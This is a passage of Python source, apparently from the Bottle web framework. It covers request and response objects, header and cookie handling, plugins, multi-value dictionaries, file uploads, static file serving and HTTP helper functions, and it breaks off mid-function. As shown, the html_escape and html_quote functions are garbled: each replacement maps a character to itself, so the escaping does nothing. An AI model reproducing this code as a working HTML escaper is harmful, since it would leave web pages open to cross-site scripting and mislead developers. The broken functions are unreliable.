work if all proxies support the ```X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
return route[0] if route else None
def copy(self):
""" Return a new :class:`Request` with a shallow :attr:`environ` copy. """
return Request(self.environ.copy())
def get(self, value, default=None): return self.environ.get(value, default)
def __getitem__(self, key): return self.environ[key]
def __delitem__(self, key): self[key] = ""; del(self.environ[key])
def __iter__(self): return iter(self.environ)
def __len__(self): return len(self.environ)
def keys(self): return self.environ.keys()
def __setitem__(self, key, value):
""" Change an environ value and clear all caches that depend on it. """
if self.environ.get('bottle.request.readonly'):
raise KeyError('The environ dictionary is read-only.')
self.environ[key] = value
todelete = ()
if key == 'wsgi.input':
todelete = ('body', 'forms', 'files', 'params', 'post', 'json')
elif key == 'QUERY_STRING':
todelete = ('query', 'params')
elif key.startswith('HTTP_'):
todelete = ('headers', 'cookies')
for key in todelete:
self.environ.pop('bottle.request.'+key, None)
def __repr__(self):
return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url)
def __getattr__(self, name):
''' Search in self.environ for additional user defined attributes. '''
try:
var = self.environ['bottle.request.ext.%s'%name]
return var.__get__(self) if hasattr(var, '__get__') else var
except KeyError:
raise AttributeError('Attribute %r not defined.' % name)
def __setattr__(self, name, value):
if name == 'environ': return object.__setattr__(self, name, value)
self.environ['bottle.request.ext.%s'%name] = value
def _hkey(s):
return s.title().replace('_','-')
class HeaderProperty(object):
def __init__(self, name, reader=None, writer=str, default=''):
self.name, self.default = name, default
self.reader, self.writer = reader, writer
self.__doc__ = 'Current value of the %r header.' % name.title()
def __get__(self, obj, cls):
if obj is None: return self
value = obj.headers.get(self.name, self.default)
return self.reader(value) if self.reader else value
def __set__(self, obj, value):
obj.headers[self.name] = self.writer(value)
def __delete__(self, obj):
del obj.headers[self.name]
class BaseResponse(object):
""" Storage class for a response body as well as headers and cookies.
This class does support dict-like case-insensitive item-access to
headers, but is NOT a dict. Most notably, iterating over a response
yields parts of the body and not the headers.
:param body: The response body as one of the supported types.
:param status: Either an HTTP status code (e.g. 200) or a status line
including the reason phrase (e.g. '200 OK').
:param headers: A dictionary or a list of name-value pairs.
Additional keyword arguments are added to the list of headers.
Underscores in the header name are replaced with dashes.
"""
default_status = 200
default_content_type = 'text/html; charset=UTF-8'
# Header blacklist for specific response codes
# (rfc2616 section 10.2.3 and 10.3.5)
bad_headers = {
204: set(('Content-Type',)),
304: set(('Allow', 'Content-Encoding', 'Content-Language',
'Content-Length', 'Content-Range', 'Content-Type',
'Content-Md5', 'Last-Modified'))}
def __init__(self, body='', status=None, headers=None, **more_headers):
self._cookies = None
self._headers = {}
self.body = body
self.status = status or self.default_status
if headers:
if isinstance(headers, dict):
headers = headers.items()
for name, value in headers:
self.add_header(name, value)
if more_headers:
for name, value in more_headers.items():
self.add_header(name, value)
def copy(self, cls=None):
''' Returns a copy of self. '''
cls = cls or BaseResponse
assert issubclass(cls, BaseResponse)
copy = cls()
copy.status = self.status
copy._headers = dict((k, v[:]) for (k, v) in self._headers.items())
if self._cookies:
copy._cookies = SimpleCookie()
copy._cookies.load(self._cookies.output())
return copy
def __iter__(self):
return iter(self.body)
def close(self):
if hasattr(self.body, 'close'):
self.body.close()
@property
def status_line(self):
''' The HTTP status line as a string (e.g. ``404 Not Found``).'''
return self._status_line
@property
def status_code(self):
''' The HTTP status code as an integer (e.g. 404).'''
return self._status_code
def _set_status(self, status):
if isinstance(status, int):
code, status = status, _HTTP_STATUS_LINES.get(status)
elif ' ' in status:
status = status.strip()
code = int(status.split()[0])
else:
raise ValueError('String status line without a reason phrase.')
if not 100 <= code <= 999: raise ValueError('Status code out of range.')
self._status_code = code
self._status_line = str(status or ('%d Unknown' % code))
def _get_status(self):
return self._status_line
status = property(_get_status, _set_status, None,
''' A writeable property to change the HTTP response status. It accepts
either a numeric code (100-999) or a string with a custom reason
phrase (e.g. "404 Brain not found"). Both :data:`status_line` and
:data:`status_code` are updated accordingly. The return value is
always a status string. ''')
del _get_status, _set_status
@property
def headers(self):
''' An instance of :class:`HeaderDict`, a case-insensitive dict-like
view on the response headers. '''
hdict = HeaderDict()
hdict.dict = self._headers
return hdict
def __contains__(self, name): return _hkey(name) in self._headers
def __delitem__(self, name): del self._headers[_hkey(name)]
def __getitem__(self, name): return self._headers[_hkey(name)][-1]
def __setitem__(self, name, value): self._headers[_hkey(name)] = [str(value)]
def get_header(self, name, default=None):
''' Return the value of a previously defined header. If there is no
header with that name, return a default value. '''
return self._headers.get(_hkey(name), [default])[-1]
def set_header(self, name, value):
''' Create a new response header, replacing any previously defined
headers with the same name. '''
self._headers[_hkey(name)] = [str(value)]
def add_header(self, name, value):
''' Add an additional response header, not removing duplicates. '''
self._headers.setdefault(_hkey(name), []).append(str(value))
def iter_headers(self):
''' Yield (header, value) tuples, skipping headers that are not
allowed with the current response status code. '''
return self.headerlist
@property
def headerlist(self):
''' WSGI conform list of (header, value) tuples. '''
out = []
headers = list(self._headers.items())
if 'Content-Type' not in self._headers:
headers.append(('Content-Type', [self.default_content_type]))
if self._status_code in self.bad_headers:
bad_headers = self.bad_headers[self._status_code]
headers = [h for h in headers if h[0] not in bad_headers]
out += [(name, val) for name, vals in headers for val in vals]
if self._cookies:
for c in self._cookies.values():
out.append(('Set-Cookie', c.OutputString()))
return out
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int)
expires = HeaderProperty('Expires',
reader=lambda x: datetime.utcfromtimestamp(parse_date(x)),
writer=lambda x: http_date(x))
@property
def charset(self, default='UTF-8'):
""" Return the charset specified in the content-type header (default: utf8). """
if 'charset=' in self.content_type:
return self.content_type.split('charset=')[-1].split(';')[0].strip()
return default
def set_cookie(self, name, value, secret=None, **options):
''' Create a new cookie or replace an old one. If the `secret` parameter is
set, create a `Signed Cookie` (described below).
:param name: the name of the cookie.
:param value: the value of the cookie.
:param secret: a signature key required for signed cookies.
Additionally, this method accepts all RFC 2109 attributes that are
supported by :class:`cookie.Morsel`, including:
:param max_age: maximum age in seconds. (default: None)
:param expires: a datetime object or UNIX timestamp. (default: None)
:param domain: the domain that is allowed to read the cookie.
(default: current domain)
:param path: limits the cookie to a given path (default: current path)
:param secure: limit the cookie to HTTPS connections (default: off).
:param httponly: prevents client-side javascript to read this cookie
(default: off, requires Python 2.6 or newer).
If neither `expires` nor `max_age` is set (default), the cookie will
expire at the end of the browser session (as soon as the browser
window is closed).
Signed cookies may store any pickle-able object and are
cryptographically signed to prevent manipulation. Keep in mind that
cookies are limited to 4kb in most browsers.
Warning: Signed cookies are not encrypted (the client can still see
the content) and not copy-protected (the client can restore an old
cookie). The main intention is to make pickling and unpickling
save, not to store secret information at client side.
'''
if not self._cookies:
self._cookies = SimpleCookie()
if secret:
value = touni(cookie_encode((name, value), secret))
elif not isinstance(value, basestring):
raise TypeError('Secret key missing for non-string Cookie.')
if len(value) > 4096: raise ValueError('Cookie value to long.')
self._cookies[name] = value
for key, value in options.items():
if key == 'max_age':
if isinstance(value, timedelta):
value = value.seconds + value.days * 24 * 3600
if key == 'expires':
if isinstance(value, (datedate, datetime)):
value = value.timetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
self._cookies[name][key.replace('_', '-')] = value
def delete_cookie(self, key, **kwargs):
''' Delete a cookie. Be sure to use the same `domain` and `path`
settings as used to create the cookie. '''
kwargs['max_age'] = -1
kwargs['expires'] = 0
self.set_cookie(key, '', **kwargs)
def __repr__(self):
out = ''
for name, value in self.headerlist:
out += '%s: %s\n' % (name.title(), value.strip())
return out
def _local_property():
ls = threading.local()
def fget(self):
try: return ls.var
except AttributeError:
raise RuntimeError("Request context not initialized.")
def fset(self, value): ls.var = value
def fdel(self): del ls.var
return property(fget, fset, fdel, 'Thread-local property')
class LocalRequest(BaseRequest):
''' A thread-local subclass of :class:`BaseRequest` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`request`). If accessed during a
request/response cycle, this instance always refers to the *current*
request (even on a multithreaded server). '''
bind = BaseRequest.__init__
environ = _local_property()
class LocalResponse(BaseResponse):
''' A thread-local subclass of :class:`BaseResponse` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`response`). Its attributes are used
to build the HTTP response at the end of the request/response cycle.
'''
bind = BaseResponse.__init__
_status_line = _local_property()
_status_code = _local_property()
_cookies = _local_property()
_headers = _local_property()
body = _local_property()
Request = BaseRequest
Response = BaseResponse
class HTTPResponse(Response, BottleException):
def __init__(self, body='', status=None, headers=None, **more_headers):
super(HTTPResponse, self).__init__(body, status, headers, **more_headers)
def apply(self, response):
response._status_code = self._status_code
response._status_line = self._status_line
response._headers = self._headers
response._cookies = self._cookies
response.body = self.body
class HTTPError(HTTPResponse):
default_status = 500
def __init__(self, status=None, body=None, exception=None, traceback=None,
**options):
self.exception = exception
self.traceback = traceback
super(HTTPError, self).__init__(body, status, **options)
###############################################################################
# Plugins ######################################################################
###############################################################################
class PluginError(BottleException): pass
class JSONPlugin(object):
name = 'json'
api = 2
def __init__(self, json_dumps=json_dumps):
self.json_dumps = json_dumps
def apply(self, callback, route):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization succesful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
class TemplatePlugin(object):
''' This plugin applies the :func:`view` decorator to all routes with a
`template` config parameter. If the parameter is a tuple, the second
element must be a dict with additional options (e.g. `template_engine`)
or default variables for the template. '''
name = 'template'
api = 2
def apply(self, callback, route):
conf = route.config.get('template')
if isinstance(conf, (tuple, list)) and len(conf) == 2:
return view(conf[0], **conf[1])(callback)
elif isinstance(conf, str):
return view(conf)(callback)
else:
return callback
#: Not a plugin, but part of the plugin API. TODO: Find a better place.
class _ImportRedirect(object):
def __init__(self, name, impmask):
''' Create a virtual package that redirects imports (see PEP 302). '''
self.name = name
self.impmask = impmask
self.module = sys.modules.setdefault(name, imp.new_module(name))
self.module.__dict__.update({'__file__': __file__, '__path__': [],
'__all__': [], '__loader__': self})
sys.meta_path.append(self)
def find_module(self, fullname, path=None):
if '.' not in fullname: return
packname, modname = fullname.rsplit('.', 1)
if packname != self.name: return
return self
def load_module(self, fullname):
if fullname in sys.modules: return sys.modules[fullname]
packname, modname = fullname.rsplit('.', 1)
realname = self.impmask % modname
__import__(realname)
module = sys.modules[fullname] = sys.modules[realname]
setattr(self.module, modname, module)
module.__loader__ = self
return module
###############################################################################
# Common Utilities #############################################################
###############################################################################
class MultiDict(DictMixin):
""" This dict stores multiple values per key, but behaves exactly like a
normal dict in that it returns only the newest value for any given key.
There are special methods available to access the full list of values.
"""
def __init__(self, *a, **k):
self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items())
def __len__(self): return len(self.dict)
def __iter__(self): return iter(self.dict)
def __contains__(self, key): return key in self.dict
def __delitem__(self, key): del self.dict[key]
def __getitem__(self, key): return self.dict[key][-1]
def __setitem__(self, key, value): self.append(key, value)
def keys(self): return self.dict.keys()
if py3k:
def values(self): return (v[-1] for v in self.dict.values())
def items(self): return ((k, v[-1]) for k, v in self.dict.items())
def allitems(self):
return ((k, v) for k, vl in self.dict.items() for v in vl)
iterkeys = keys
itervalues = values
iteritems = items
iterallitems = allitems
else:
def values(self): return [v[-1] for v in self.dict.values()]
def items(self): return [(k, v[-1]) for k, v in self.dict.items()]
def iterkeys(self): return self.dict.iterkeys()
def itervalues(self): return (v[-1] for v in self.dict.itervalues())
def iteritems(self):
return ((k, v[-1]) for k, v in self.dict.iteritems())
def iterallitems(self):
return ((k, v) for k, vl in self.dict.iteritems() for v in vl)
def allitems(self):
return [(k, v) for k, vl in self.dict.iteritems() for v in vl]
def get(self, key, default=None, index=-1, type=None):
''' Return the most recent value for a key.
:param default: The default value to be returned if the key is not
present or the type conversion fails.
:param index: An index for the list of available values.
:param type: If defined, this callable is used to cast the value
into a specific type. Exception are suppressed and result in
the default value to be returned.
'''
try:
val = self.dict[key][index]
return type(val) if type else val
except Exception:
pass
return default
def append(self, key, value):
''' Add a new value to the list of values for this key. '''
self.dict.setdefault(key, []).append(value)
def replace(self, key, value):
''' Replace the list of values with a single value. '''
self.dict[key] = [value]
def getall(self, key):
''' Return a (possibly empty) list of values for a key. '''
return self.dict.get(key) or []
#: Aliases for WTForms to mimic other multi-dict APIs (Django)
getone = get
getlist = getall
class FormsDict(MultiDict):
''' This :class:`MultiDict` subclass is used to store request form data.
Additionally to the normal dict-like item access methods (which return
unmodified data as native strings), this container also supports
attribute-like access to its values. Attributes are automatically de-
or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing
attributes default to an empty string. '''
#: Encoding used for attribute values.
input_encoding = 'utf8'
#: If true (default), unicode strings are first encoded with `latin1`
#: and then decoded to match :attr:`input_encoding`.
recode_unicode = True
def _fix(self, s, encoding=None):
if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI
return s.encode('latin1').decode(encoding or self.input_encoding)
elif isinstance(s, bytes): # Python 2 WSGI
return s.decode(encoding or self.input_encoding)
else:
return s
def decode(self, encoding=None):
''' Returns a copy with all keys and values de- or recoded to match
:attr:`input_encoding`. Some libraries (e.g. WTForms) want a
unicode dictionary. '''
copy = FormsDict()
enc = copy.input_encoding = encoding or self.input_encoding
copy.recode_unicode = False
for key, value in self.allitems():
copy.append(self._fix(key, enc), self._fix(value, enc))
return copy
def getunicode(self, name, default=None, encoding=None):
''' Return the value as a unicode string, or the default. '''
try:
return self._fix(self[name], encoding)
except (UnicodeError, KeyError):
return default
def __getattr__(self, name, default=unicode()):
# Without this guard, pickle generates a cryptic TypeError:
if name.startswith('__') and name.endswith('__'):
return super(FormsDict, self).__getattr__(name)
return self.getunicode(name, default=default)
class HeaderDict(MultiDict):
""" A case-insensitive version of :class:`MultiDict` that defaults to
replace the old value instead of appending it. """
def __init__(self, *a, **ka):
self.dict = {}
if a or ka: self.update(*a, **ka)
def __contains__(self, key): return _hkey(key) in self.dict
def __delitem__(self, key): del self.dict[_hkey(key)]
def __getitem__(self, key): return self.dict[_hkey(key)][-1]
def __setitem__(self, key, value): self.dict[_hkey(key)] = [str(value)]
def append(self, key, value):
self.dict.setdefault(_hkey(key), []).append(str(value))
def replace(self, key, value): self.dict[_hkey(key)] = [str(value)]
def getall(self, key): return self.dict.get(_hkey(key)) or []
def get(self, key, default=None, index=-1):
return MultiDict.get(self, _hkey(key), default, index)
def filter(self, names):
for name in [_hkey(n) for n in names]:
if name in self.dict:
del self.dict[name]
class WSGIHeaderDict(DictMixin):
''' This dict-like class wraps a WSGI environ dict and provides convenient
access to HTTP_* fields. Keys and values are native strings
(2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI
environment contains non-native string values, these are de- or encoded
using a lossless 'latin1' character set.
The API will remain stable even on changes to the relevant PEPs.
Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one
that uses non-native strings.)
'''
#: List of keys that do not have a ``HTTP_`` prefix.
cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH')
def __init__(self, environ):
self.environ = environ
def _ekey(self, key):
''' Translate header field name to CGI/WSGI environ key. '''
key = key.replace('-','_').upper()
if key in self.cgikeys:
return key
return 'HTTP_' + key
def raw(self, key, default=None):
''' Return the header value as is (may be bytes or unicode). '''
return self.environ.get(self._ekey(key), default)
def __getitem__(self, key):
return tonat(self.environ[self._ekey(key)], 'latin1')
def __setitem__(self, key, value):
raise TypeError("%s is read-only." % self.__class__)
def __delitem__(self, key):
raise TypeError("%s is read-only." % self.__class__)
def __iter__(self):
for key in self.environ:
if key[:5] == 'HTTP_':
yield key[5:].replace('_', '-').title()
elif key in self.cgikeys:
yield key.replace('_', '-').title()
def keys(self): return [x for x in self]
def __len__(self): return len(self.keys())
def __contains__(self, key): return self._ekey(key) in self.environ
class ConfigDict(dict):
''' A dict-like configuration storage with additional support for
namespaces, validators, meta-data, on_change listeners and more.
'''
__slots__ = ('_meta', '_on_change')
def __init__(self):
self._meta = {}
self._on_change = lambda name, value: None
def load_config(self, filename):
''' Load values from an *.ini style config file.
If the config file contains sections, their names are used as
namespaces for the values within. The two special sections
``DEFAULT`` and ``bottle`` refer to the root namespace (no prefix).
'''
conf = ConfigParser()
conf.read(filename)
for section in conf.sections():
for key, value in conf.items(section):
if section not in ('DEFAULT', 'bottle'):
key = section + '.' + key
self[key] = value
return self
def load_dict(self, source, namespace=''):
''' Load values from a dictionary structure. Nesting can be used to
represent namespaces.
>>> c.load_dict({'some': {'namespace': {'key': 'value'} } })
{'some.namespace.key': 'value'}
'''
for key, value in source.items():
if isinstance(key, str):
nskey = (namespace + '.' + key).strip('.')
if isinstance(value, dict):
self.load_dict(value, namespace=nskey)
else:
self[nskey] = value
else:
raise TypeError('Key has type %r (not a string)' % type(key))
return self
def update(self, *a, **ka):
''' If the first parameter is a string, all keys are prefixed with this
namespace. Apart from that it works just as the usual dict.update().
Example: ``update('some.namespace', key='value')`` '''
prefix = ''
if a and isinstance(a[0], str):
prefix = a[0].strip('.') + '.'
a = a[1:]
for key, value in dict(*a, **ka).items():
self[prefix+key] = value
def setdefault(self, key, value):
if key not in self:
self[key] = value
def __setitem__(self, key, value):
if not isinstance(key, str):
raise TypeError('Key has type %r (not a string)' % type(key))
value = self.meta_get(key, 'filter', lambda x: x)(value)
if key in self and self[key] is value:
return
self._on_change(key, value)
dict.__setitem__(self, key, value)
def __delitem__(self, key):
self._on_change(key, None)
dict.__delitem__(self, key)
def meta_get(self, key, metafield, default=None):
''' Return the value of a meta field for a key. '''
return self._meta.get(key, {}).get(metafield, default)
def meta_set(self, key, metafield, value):
''' Set the meta field for a key to a new value. This triggers the
on-change handler for existing keys. '''
self._meta.setdefault(key, {})[metafield] = value
if key in self:
self[key] = self[key]
def meta_list(self, key):
''' Return an iterable of meta field names defined for a key. '''
return self._meta.get(key, {}).keys()
class AppStack(list):
""" A stack-like list. Calling it returns the head of the stack. """
def __call__(self):
""" Return the current default application. """
return self[-1]
def push(self, value=None):
""" Add a new :class:`Bottle` instance to the stack """
if not isinstance(value, Bottle):
value = Bottle()
self.append(value)
return value
class WSGIFileWrapper(object):
def __init__(self, fp, buffer_size=1024*64):
self.fp, self.buffer_size = fp, buffer_size
for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'):
if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr))
def __iter__(self):
buff, read = self.buffer_size, self.read
while True:
part = read(buff)
if not part: return
yield part
class _closeiter(object):
''' This only exists to be able to attach a .close method to iterators that
do not support attribute assignment (most of itertools). '''
def __init__(self, iterator, close=None):
self.iterator = iterator
self.close_callbacks = makelist(close)
def __iter__(self):
return iter(self.iterator)
def close(self):
for func in self.close_callbacks:
func()
class ResourceManager(object):
''' This class manages a list of search paths and helps to find and open
application-bound resources (files).
:param base: default value for :meth:`add_path` calls.
:param opener: callable used to open resources.
:param cachemode: controls which lookups are cached. One of 'all',
'found' or 'none'.
'''
def __init__(self, base='./', opener=open, cachemode='all'):
self.opener = open
self.base = base
self.cachemode = cachemode
#: A list of search paths. See :meth:`add_path` for details.
self.path = []
#: A cache for resolved paths. ``res.cache.clear()`` clears the cache.
self.cache = {}
def add_path(self, path, base=None, index=None, create=False):
''' Add a new path to the list of search paths. Return False if the
path does not exist.
:param path: The new search path. Relative paths are turned into
an absolute and normalized form. If the path looks like a file
(not ending in `/`), the filename is stripped off.
:param base: Path used to absolutize relative search paths.
Defaults to :attr:`base` which defaults to ``os.getcwd()``.
:param index: Position within the list of search paths. Defaults
to last index (appends to the list).
The `base` parameter makes it easy to reference files installed
along with a python module or package::
res.add_path('./resources/', __file__)
'''
base = os.path.abspath(os.path.dirname(base or self.base))
path = os.path.abspath(os.path.join(base, os.path.dirname(path)))
path += os.sep
if path in self.path:
self.path.remove(path)
if create and not os.path.isdir(path):
os.makedirs(path)
if index is None:
self.path.append(path)
else:
self.path.insert(index, path)
self.cache.clear()
return os.path.exists(path)
def __iter__(self):
''' Iterate over all existing files in all registered paths. '''
search = self.path[:]
while search:
path = search.pop()
if not os.path.isdir(path): continue
for name in os.listdir(path):
full = os.path.join(path, name)
if os.path.isdir(full): search.append(full)
else: yield full
def lookup(self, name):
''' Search for a resource and return an absolute file path, or `None`.
The :attr:`path` list is searched in order. The first match is
returend. Symlinks are followed. The result is cached to speed up
future lookups. '''
if name not in self.cache or DEBUG:
for path in self.path:
fpath = os.path.join(path, name)
if os.path.isfile(fpath):
if self.cachemode in ('all', 'found'):
self.cache[name] = fpath
return fpath
if self.cachemode == 'all':
self.cache[name] = None
return self.cache[name]
def open(self, name, mode='r', *args, **kwargs):
''' Find a resource and return a file object, or raise IOError. '''
fname = self.lookup(name)
if not fname: raise IOError("Resource %r not found." % name)
return self.opener(fname, mode=mode, *args, **kwargs)
class FileUpload(object):
def __init__(self, fileobj, name, filename, headers=None):
''' Wrapper for file uploads. '''
#: Open file(-like) object (BytesIO buffer or temporary file)
self.file = fileobj
#: Name of the upload form field
self.name = name
#: Raw filename as sent by the client (may contain unsafe characters)
self.raw_filename = filename
#: A :class:`HeaderDict` with additional headers (e.g. content-type)
self.headers = HeaderDict(headers) if headers else HeaderDict()
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int, default=-1)
@cached_property
def filename(self):
''' Name of the file on the client file system, but normalized to ensure
file system compatibility (lowercase, no whitespace, no path
separators, no unsafe characters, ASCII only). An empty filename
is returned as 'empty'.
'''
from unicodedata import normalize #TODO: Module level import?
fname = self.raw_filename
if isinstance(fname, unicode):
fname = normalize('NFKD', fname).encode('ASCII', 'ignore')
fname = fname.decode('ASCII', 'ignore')
fname = os.path.basename(fname.replace('\\', os.path.sep))
fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip().lower()
fname = re.sub(r'[-\s]+', '-', fname.strip('.').strip())
return fname or 'empty'
def _copy_file(self, fp, chunk_size=2**16):
read, write, offset = self.file.read, fp.write, self.file.tell()
while 1:
buf = read(chunk_size)
if not buf: break
write(buf)
self.file.seek(offset)
def save(self, destination, overwrite=False, chunk_size=2**16):
''' Save file to disk or copy its content to an open file(-like) object.
If *destination* is a directory, :attr:`filename` is added to the
path. Existing files are not overwritten by default (IOError).
:param destination: File path, directory or file(-like) object.
:param overwrite: If True, replace existing files. (default: False)
:param chunk_size: Bytes to read at a time. (default: 64kb)
'''
if isinstance(destination, basestring): # Except file-likes here
if os.path.isdir(destination):
destination = os.path.join(destination, self.filename)
if not overwrite and os.path.exists(destination):
raise IOError('File exists.')
with open(destination, 'wb') as fp:
self._copy_file(fp, chunk_size)
else:
self._copy_file(destination, chunk_size)
###############################################################################
# Application Helper ###########################################################
###############################################################################
def abort(code=500, text='Unknown Error.'):
""" Aborts execution and causes a HTTP error. """
raise HTTPError(code, text)
def redirect(url, code=None):
""" Aborts execution and causes a 303 or 302 redirect, depending on
the HTTP protocol version. """
if not code:
code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302
res = response.copy(cls=HTTPResponse)
res.status = code
res.body = ""
res.set_header('Location', urljoin(request.url, url))
raise res
def _file_iter_range(fp, offset, bytes, maxread=1024*1024):
''' Yield chunks from a range in a file. No chunk is bigger than maxread.'''
fp.seek(offset)
while bytes > 0:
part = fp.read(min(bytes, maxread))
if not part: break
bytes -= len(part)
yield part
def static_file(filename, root, mimetype='auto', download=False, charset='UTF-8'):
""" Open a file in a safe way and return :exc:`HTTPResponse` with status
code 200, 305, 401 or 404. The ``Content-Type``, ``Content-Encoding``,
``Content-Length`` and ``Last-Modified`` headers are set if possible.
Special support for ``If-Modified-Since``, ``Range`` and ``HEAD``
requests.
:param filename: Name or path of the file to send.
:param root: Root path for file lookups. Should be an absolute directory
path.
:param mimetype: Defines the content-type header (default: guess from
file extension)
:param download: If True, ask the browser to open a `Save as...` dialog
instead of opening the file with the associated program. You can
specify a custom filename as a string. If not specified, the
original filename is used (default: False).
:param charset: The charset to use for files with a ``text/*``
mime-type. (default: UTF-8)
"""
root = os.path.abspath(root) + os.sep
filename = os.path.abspath(os.path.join(root, filename.strip('/\\')))
headers = dict()
if not filename.startswith(root):
return HTTPError(403, "Access denied.")
if not os.path.exists(filename) or not os.path.isfile(filename):
return HTTPError(404, "File does not exist.")
if not os.access(filename, os.R_OK):
return HTTPError(403, "You do not have permission to access this file.")
if mimetype == 'auto':
mimetype, encoding = mimetypes.guess_type(filename)
if encoding: headers['Content-Encoding'] = encoding
if mimetype:
if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype:
mimetype += '; charset=%s' % charset
headers['Content-Type'] = mimetype
if download:
download = os.path.basename(filename if download == True else download)
headers['Content-Disposition'] = 'attachment; filename="%s"' % download
stats = os.stat(filename)
headers['Content-Length'] = clen = stats.st_size
lm = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(stats.st_mtime))
headers['Last-Modified'] = lm
ims = request.environ.get('HTTP_IF_MODIFIED_SINCE')
if ims:
ims = parse_date(ims.split(";")[0].strip())
if ims is not None and ims >= int(stats.st_mtime):
headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime())
return HTTPResponse(status=304, **headers)
body = '' if request.method == 'HEAD' else open(filename, 'rb')
headers["Accept-Ranges"] = "bytes"
ranges = request.environ.get('HTTP_RANGE')
if 'HTTP_RANGE' in request.environ:
ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen))
if not ranges:
return HTTPError(416, "Requested Range Not Satisfiable")
offset, end = ranges[0]
headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen)
headers["Content-Length"] = str(end-offset)
if body: body = _file_iter_range(body, offset, end-offset)
return HTTPResponse(body, status=206, **headers)
return HTTPResponse(body, **headers)
###############################################################################
# HTTP Utilities and MISC (TODO) ###############################################
###############################################################################
def debug(mode=True):
""" Change the debug level.
There is only one debug level supported at the moment."""
global DEBUG
if mode: warnings.simplefilter('default')
DEBUG = bool(mode)
def http_date(value):
if isinstance(value, (datedate, datetime)):
value = value.utctimetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
if not isinstance(value, basestring):
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
return value
def parse_date(ims):
""" Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """
try:
ts = email.utils.parsedate_tz(ims)
return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone
except (TypeError, ValueError, IndexError, OverflowError):
return None
def parse_auth(header):
""" Parse rfc2617 HTTP authentication header string (basic) and return (user,pass) tuple or None"""
try:
method, data = header.split(None, 1)
if method.lower() == 'basic':
user, pwd = touni(base64.b64decode(tob(data))).split(':',1)
return user, pwd
except (KeyError, ValueError):
return None
def parse_range_header(header, maxlen=0):
''' Yield (start, end) ranges parsed from a HTTP Range header. Skip
unsatisfiable ranges. The end index is non-inclusive.'''
if not header or header[:6] != 'bytes=': return
ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r]
for start, end in ranges:
try:
if not start: # bytes=-100 -> last 100 bytes
start, end = max(0, maxlen-int(end)), maxlen
elif not end: # bytes=100- -> all but the first 99 bytes
start, end = int(start), maxlen
else: # bytes=100-200 -> bytes 100-200 (inclusive)
start, end = int(start), min(int(end)+1, maxlen)
if 0 <= start < end <= maxlen:
yield start, end
except ValueError:
pass
def _parse_qsl(qs):
r = []
for pair in qs.replace(';','&').split('&'):
if not pair: continue
nv = pair.split('=', 1)
if len(nv) != 2: nv.append('')
key = urlunquote(nv[0].replace('+', ' '))
value = urlunquote(nv[1].replace('+', ' '))
r.append((key, value))
return r
def _lscmp(a, b):
''' Compares two strings in a cryptographically safe way:
Runtime is not affected by length of common prefix. '''
return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b)
def cookie_encode(data, key):
''' Encode and sign a pickle-able object. Return a (byte) string '''
msg = base64.b64encode(pickle.dumps(data, -1))
sig = base64.b64encode(hmac.new(tob(key), msg).digest())
return tob('!') + sig + tob('?') + msg
def cookie_decode(data, key):
''' Verify and decode an encoded string. Return an object or None.'''
data = tob(data)
if cookie_is_encoded(data):
sig, msg = data.split(tob('?'), 1)
if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg).digest())):
return pickle.loads(base64.b64decode(msg))
return None
def cookie_is_encoded(data):
''' Return True if the argument looks like a encoded cookie.'''
return bool(data.startswith(tob('!')) and tob('?') in data)
def html_escape(string):
''' Escape HTML special characters ``&<>`` and quotes ``'"``. '''
return string.replace('&','&').replace('<','<').replace('>','>')\
.replace('"','"').replace("'",''')
def html_quote(string):
''' Escape and quote a string to be used as an HTTP attribute.'''
return '"%s"' % html_escape(string).replace('\n','%#10;')\
.replace('\r',' ').replace('\t','	')
def yieldroutes(func):
""" Return a generator for routes that match the signature (name, args)
of the func parameter. This may yield more than one route if the function
takes optional keyword arguments. The output is best described by example::
a() -> '/a'
b(x, y) -> '/b/<x>/<y>'
c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>'
d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>'
"""
path = '/' + func.__name__.replace('__','/').lstrip('/')
spec = getargspec(func)
argc = len(spec[0]) - len(spec[3] or [])
